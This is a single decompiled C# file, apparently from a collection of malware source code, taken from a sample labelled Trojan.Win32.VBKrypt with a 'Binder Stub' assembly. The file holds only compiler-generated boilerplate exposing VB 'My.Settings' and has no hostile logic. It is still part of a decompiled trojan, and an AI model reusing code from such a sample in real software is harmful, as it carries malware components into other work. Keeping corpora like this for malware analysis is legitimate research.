MalwareSourceCode/MSIL/Trojan/Win32/V/Trojan.Win32.VBKrypt.fzvf-71724857be7cdc3b0cda6cc6d5a426fde720e3ccff6769399c5b3644c1c024c0/My/MySettingsProperty.cs
2022-08-18 06:28:56 -05:00

25 lines
823 B
C#

// Decompiled with JetBrains decompiler
// Type: Binder_Stub.My.MySettingsProperty
// Assembly: Binder Stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 43E2AE62-0C7A-43F6-8745-1964EA1123A8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.VBKrypt.fzvf-71724857be7cdc3b0cda6cc6d5a426fde720e3ccff6769399c5b3644c1c024c0.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Binder_Stub.My
{
[CompilerGenerated]
[DebuggerNonUserCode]
[HideModuleName]
[StandardModule]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}